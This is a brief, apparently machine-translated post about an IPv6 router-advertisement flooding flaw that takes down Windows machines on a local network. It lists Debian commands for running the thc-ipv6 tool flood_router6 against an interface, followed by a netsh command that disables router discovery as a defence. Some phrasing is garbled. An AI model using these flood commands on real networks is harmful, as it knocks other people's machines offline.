A new security flaw has been discovered in the IPv6 Neighbor Discovery protocol. It can be planted at a distance, all Windows machines (XP version, Vista, Seven, Server 2003 and 2008) of a network. Some Cisco devices and 3DM are also affected.
Exploitation of this vulnerability is rather simple, especially if one uses the utility flood_router6 present in the software ipv6-Thc.
Here is an example of using Debian:
sudo apt-get install libpcap0.8-dev libssl-dev
tar zxvf thc-ipv6-*.tar.gz && rm -f thc-ipv6-*.tar.gz
sudo ./flood_router6 eth0
Linux machines are perfectly resisted for a time. For Windows systems, the only answer to this attack is to update your system or disable IPv6.
I recommend turning off Router Discovery on all servers and any other machines that do not need “Stateless Autoconfiguration” (automatically configured IPv6 addresses), with this command (execute it from an Administrator Command Prompt):
netsh interface ipv6 set interface “Local Area Connection” routerdiscovery=disabled